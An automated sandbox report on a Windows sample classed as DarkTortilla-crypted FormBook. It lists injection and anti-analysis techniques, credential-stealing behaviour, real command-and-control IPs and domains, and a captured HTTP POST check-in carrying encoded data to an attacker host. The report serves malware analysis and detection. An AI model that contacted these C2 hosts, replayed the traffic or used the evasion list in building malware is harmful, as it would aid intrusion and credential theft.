Edit tour

Windows Analysis Report
begin.exe

Overview

General Information

Sample name:	begin.exe
Analysis ID:	1632014
MD5:	cf3268c419da49574f98a9a36d263165
SHA1:	d0f43a0a26dbe8900a7ff684870e8c1ef424286d
SHA256:	0fda5f40e7752da1cdd8b8ae961258251b78f421dd2a089a7184aa33b83db06c
Tags:	exeuser-aachum
Infos:

Detection

DarkTortilla, FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected FormBook

AI detected suspicious PE digital signature

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found direct / indirect Syscall (likely to bypass EDR)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

begin.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\begin.exe" MD5: CF3268C419DA49574F98A9A36D263165)

AddInProcess32.exe (PID: 8172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 8180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 6692 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

fMCYiMEFQZmFBs7vgZ5.exe (PID: 4396 cmdline: "C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\miEyYqXzMPxCr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

comp.exe (PID: 1752 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)

fMCYiMEFQZmFBs7vgZ5.exe (PID: 3040 cmdline: "C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\6m79W5kBr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 2888 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.2477632033.00000000034C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1979345858.0000000001040000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1898946786.0000000005950000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000B.00000002.1978397440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1891732318.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.2477550350.0000000003470000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.2474981906.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1883854982.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000F.00000002.2479750364.0000000004E20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1981382143.0000000002050000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2477132042.00000000037A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: begin.exe PID: 7756	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: begin.exe PID: 7756	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.begin.exe.5950000.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.begin.exe.5950000.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.begin.exe.3db9550.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.begin.exe.3db9550.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
11.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
11.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T18:33:24.913134+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49724	13.248.169.48	80	TCP
2025-03-07T18:33:44.014863+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49728	104.21.64.1	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T18:33:24.913134+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49724	13.248.169.48	80	TCP
2025-03-07T18:33:44.014863+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49728	104.21.64.1	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T18:31:43.935150+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49731	13.248.169.48	80	TCP
2025-03-07T18:33:36.475419+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49725	104.21.64.1	80	TCP
2025-03-07T18:33:39.448710+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49726	104.21.64.1	80	TCP
2025-03-07T18:33:41.164656+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49727	104.21.64.1	80	TCP
2025-03-07T18:33:49.906745+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49729	13.248.169.48	80	TCP
2025-03-07T18:33:52.262276+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49730	13.248.169.48	80	TCP

HTTP traffic detected: POST /z84n/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.kdrqcyusevx.infoOrigin: http://www.kdrqcyusevx.infoReferer: http://www.kdrqcyusevx.info/z84n/Content-Length: 203Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG GT-I9301I Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36Data Raw: 36 38 5a 44 4a 50 3d 6c 35 49 76 66 54 33 6f 55 34 55 7a 6b 39 59 55 38 65 6b 38 56 6c 67 68 49 50 35 73 58 6f 6b 4f 71 66 77 52 6d 51 65 4e 45 50 42 36 4a 41 65 35 66 69 65 64 37 64 76 78 74 2f 51 30 31 49 50 76 79 4c 4e 71 73 4d 65 42 57 51 68 2b 53 7a 6d 72 76 6c 4b 46 56 4b 6f 4b 50 46 73 34 78 5a 6a 76 51 5a 69 65 52 38 7a 6e 70 6a 73 61 48 67 4d 56 2b 73 69 2b 61 75 4c 6c 33 7a 6c 4d 45 41 36 34 49 5a 6f 4e 45 43 51 71 2f 35 7a 39 4f 66 63 36 2b 53 52 6c 39 59 42 32 72 66 34 7a 43 39 61 57 67 52 64 75 76 31 51 4a 41 59 64 6f 6d 54 35 75 51 62 79 6e 37 69 78 69 4c 63 2b 49 49 74 36 79 79 67 3d 3d Data Ascii: 68ZDJP=l5IvfT3oU4Uzk9YU8ek8VlghIP5sXokOqfwRmQeNEPB6JAe5fied7dvxt/Q01IPvyLNqsMeBWQh+SzmrvlKFVKoKPFs4xZjvQZieR8znpjsaHgMV+si+auLl3zlMEA64IZoNECQq/5z9Ofc6+SRl9YB2rf4zC9aWgRduv1QJAYdomT5uQbyn7ixiLc+IIt6yyg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 17:33:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMNIrUda6HWR5Kyb76YKJzMaEbDtsyFLGOgECWHTJKvLhdjhM%2FeuObKqs4mRCVJIIiQ5k3o0LdZDWnWbO5APIdoCj09EnDxDcgzI33X2G8un1hLueRprqc0qzvHj0sTpkmZSCXQRXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cbd6bc89274414-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=70349&min_rtt=70349&rtt_var=35174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=780&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 17:33:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTwDbc1vV7VqEBkl9Y03bRe1N0Vjbdy%2BgrjqBX2Ajl1%2FrwdUlWfXVcgLNtAWn9vMEUi9vuf1nUWhXwpikRJyu50gokEIABhTK32wdU%2FFtvxVuUEwSfa%2Fn%2FwKvu0kTqru8tCx88jx9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cbd6daead04e4d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=2140&rtt_var=1070&sent=5&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7057&delivery_rate=0&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 17:33:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNwU1eQbFVlaOxl44Nd3yfNbxzzOvM1f%2FuUVWLhAisrPzrBIZkaGxxBaYXhyLgAjPJqGW5mBBTjWdxx8mBJifw41jyoVx1m6INigw%2Fq9Zi6ruO34HFtm7n3aOiSmb9zCSiShkN0mUw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cbd6ec4deec358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=31201&min_rtt=31201&rtt_var=15600&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=510&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0

Source: begin.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: begin.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: begin.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: begin.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: begin.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: begin.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: begin.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: begin.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: begin.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: begin.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: begin.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: begin.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: begin.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: begin.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: begin.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: begin.exe, 00000000.00000002.1901822268.0000000006760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlmm
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: begin.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2479750364.0000000004EE1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.layunin.xyz
Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000002.2479750364.0000000004EE1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.layunin.xyz/s9ur/
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: begin.exe, 00000000.00000002.1902878646.00000000078F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: begin.exe	String found in binary or memory: https://api.socialmediaplatform.com/postSSocial
Source: begin.exe	String found in binary or memory: https://api.yourcloudservice.com/syncUData
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: comp.exe, 0000000E.00000002.2475910554.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: comp.exe, 0000000E.00000002.2475910554.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: comp.exe, 0000000E.00000002.2475910554.00000000032CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: comp.exe, 0000000E.00000002.2475910554.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: comp.exe, 0000000E.00000002.2475910554.00000000032CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: comp.exe, 0000000E.00000003.2174620060.0000000008203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: begin.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: comp.exe, 0000000E.00000003.2188723573.000000000822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2477632033.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1979345858.0000000001040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1978397440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2477550350.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2474981906.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2479750364.0000000004E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1981382143.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2477132042.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\begin.exe	Code function: 0_2_0DD77308 NtUnmapViewOfSection,	0_2_0DD77308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0042C763 NtClose,	11_2_0042C763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172B60 NtClose,LdrInitializeThunk,	11_2_01172B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_01172DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01172C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_01172C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_011735C0 NtCreateMutant,LdrInitializeThunk,	11_2_011735C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_01174340 NtSetContextThread,	11_2_01174340
